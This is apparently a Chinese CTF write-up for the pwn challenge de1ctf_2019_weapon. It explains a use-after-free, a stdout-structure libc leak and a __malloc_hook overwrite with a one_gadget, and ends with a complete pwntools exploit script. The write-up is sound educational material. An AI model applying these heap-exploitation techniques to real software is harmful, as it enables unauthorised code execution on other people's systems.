涨知识的一个pwn题：de1ctf_2019

涨知识的一个pwn题：de1ctf_2019_weapon

没做出来，wtcl，看了师傅们的wp才找到思路，收获了很多

怎么说呢，这个题很简单但是很巧妙，逆起来几乎无难度

漏洞点位于free函数，一个简单的UAF漏洞

然后接下来说说我一开始的思路

由于程序没有提供show函数，所以几乎可以确定要打_IO_2_1_stdout_，改掉flag然后泄漏libc

但是add函数里面只能申请小于0x60的chunk，根本找不到残留的unsorted bin留下的指针

然后，然后我就找不到思路了

然后学习了一波师傅们的wp

其实这个除了UAF还有一个小漏洞，就是可以自己申请index，可以申请0-9号的任意index

这就为我们伪造unsorted bin留下了条件

思路，要想拿到unsorted bin的指针，首先我们需要一个0x60的fastbin，然后在相同的位置需要一个unsorted bin，这样fastbin的fd pointer就留下了unsorted bin的fd pointer，就可以攻击_IO_2_1_stdout_了

然后就是常规的hack __malloc_hook

仔细记录一下中间过程

先来伪造一个header，目的：可以改下一个chunk的控制信息

 1 add(0x10,0,'aaaaaaaa')
 2 add(0x10,1,'bbbbbbbb')
 3 add(0x60,2,'cccccccc')
 4 add(0x10,3,'dddddddd')
 5         
 6 free(0)
 7 free(1)
 8 free(0)
 9         
10 add(0x10,0,p64(0) + p64(0x21))
11 add(0x60,8,'eeeeeeee')
12         
13 edit(1,'x10')

这样我们可以申请到010的位置，从而可以对020这个chunk的header 进行修改，可以先改成0x71，然后free一下，然后再改成一个unsorten bin大小的chunk，再free，这样就有了残留的堆指针

1 add(0x10,1,'aaaaaaaa')    
2 add(0x10,4,p64(0) + p64(0x71))
3 edit(2,0x40 * 'a' + p64(0) + p64(0x71))    # bypass free check: the next chunk size cannot equal to 0
4 free(1)

编辑2号chunk的目的是绕过free时的检查

接下来fast bin拿到unsorted bin的fd指针

1 edit(4,p64(0) + p64(0x91))    # to change the chunk size
2 free(1)    # now , fast fd has connected unsorted bin fd

然后就是常规思路了

申请到'xddx*5'的位置，'*'需要爆破，1/16的概率，直接扔个try except

1 edit(1,'xddx65')
2 edit(4,p64(0) + p64(0x71))    # don't forget to renew size
3 payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800)    # change flags
4 payload += p64(0) * 3 + 'x00' # make _IO_write_base smaller
5 add(0x60,5,'lemon')
6 add(0x60,6,payload

成功泄漏libc，后面就是常规的__malloc_hook - 0x23

 1 libc = ELF('./libc-2.23.so')
 2 _IO_2_1_stderr_ = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')) - 192
 3 libc_base = _IO_2_1_stderr_ - libc.sym['_IO_2_1_stderr_']
 4 __malloc_hook = libc_base + libc.sym['__malloc_hook']
 5 one_gadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]
 6 one_gadget = libc_base + one_gadget_list[3]
 7 print "[*] one_gadget:",hex(one_gadget)
 8 add(0x60,5,'lemon')
 9 free(5)
10 payload = 0x13 * 'a' + p64(one_gadget)
11 edit(5,p64(__malloc_hook - 0x23))
12 add(0x60,5,'x10')
13 add(0x60,0,payload)
14 add(0x20,3,'hack')
15 gdb.attach(p)
16 p.interactive()

完整exp：

  1 from pwn import *
  2 
  3 '''
  4 author: lemon
  5 date: 2020-10-16
  6 libc version: libc-2.23.so
  7 '''
  8 
  9 local = 1
 10 
 11 binary = "./de1ctf_2019_weapon"
 12 
 13 
 14 def dbg():
 15     context.log_level = 'debug'
 16 
 17 context.terminal = ['tmux','splitw','-h']
 18 
 19 
 20 def add(size,index,content):
 21     p.sendlineafter('choice >> ','1')
 22     p.sendlineafter('wlecome input your size of weapon: ',str(size))
 23     p.sendlineafter('input index:',str(index))
 24     p.sendafter('input your name:',content)
 25 
 26 def free(index):
 27     p.sendlineafter('choice >> ','2')
 28     p.sendlineafter('input idx :',str(index))
 29 
 30 def edit(index,content):
 31     p.sendlineafter('choice >>','3')
 32     p.sendlineafter('input idx:',str(index))
 33     p.sendafter('new content:',content)
 34 
 35 while True:
 36     try:
 37         if local == 1:
 38             p = process(binary)
 39         else:
 40             p = remote("node3.buuoj.cn",26759)
 41         add(0x10,0,'aaaaaaaa')
 42         add(0x10,1,'bbbbbbbb')
 43         add(0x60,2,'cccccccc')
 44         add(0x10,3,'dddddddd')
 45         
 46         free(0)
 47         free(1)
 48         free(0)
 49         
 50         add(0x10,0,p64(0) + p64(0x21))
 51         add(0x60,8,'eeeeeeee')
 52         
 53         edit(1,'x10')
 54         
 55         add(0x10,1,'aaaaaaaa')    
 56         add(0x10,4,p64(0) + p64(0x71))
 57         
 58         edit(2,0x40 * 'a' + p64(0) + p64(0x71))    # bypass free check: the next chunk size cannot equal to 0
 59         
 60         free(1)
 61         
 62         edit(4,p64(0) + p64(0x91))    # to change the chunk size
 63         free(1)    # now , fast fd has connected unsorted bin fd
 64 
 65         edit(1,'xddx65')
 66         edit(4,p64(0) + p64(0x71))    # don't forget to renew size
 67         
 68         payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800)    # change flags
 69         payload += p64(0) * 3 + 'x00' # make _IO_write_base smaller
 70         
 71         add(0x60,5,'lemon')
 72         add(0x60,6,payload)
 73     
 74         
 75         libc = ELF('./libc-2.23.so')
 76         _IO_2_1_stderr_ = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')) - 192
 77         libc_base = _IO_2_1_stderr_ - libc.sym['_IO_2_1_stderr_']
 78         
 79         __malloc_hook = libc_base + libc.sym['__malloc_hook']
 80         
 81         one_gadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]
 82         one_gadget = libc_base + one_gadget_list[3]
 83         print "[*] one_gadget:",hex(one_gadget)
 84 
 85         add(0x60,5,'lemon')
 86         free(5)
 87 
 88         payload = 0x13 * 'a' + p64(one_gadget)
 89 
 90         edit(5,p64(__malloc_hook - 0x23))
 91         add(0x60,5,'x10')
 92         add(0x60,0,payload)
 93 
 94         add(0x20,3,'hack')
 95 
 96         gdb.attach(p)
 97         p.interactive()
 98         break
 99     
100     except Exception as e:
101         print(e)
102         p.close()
103         continue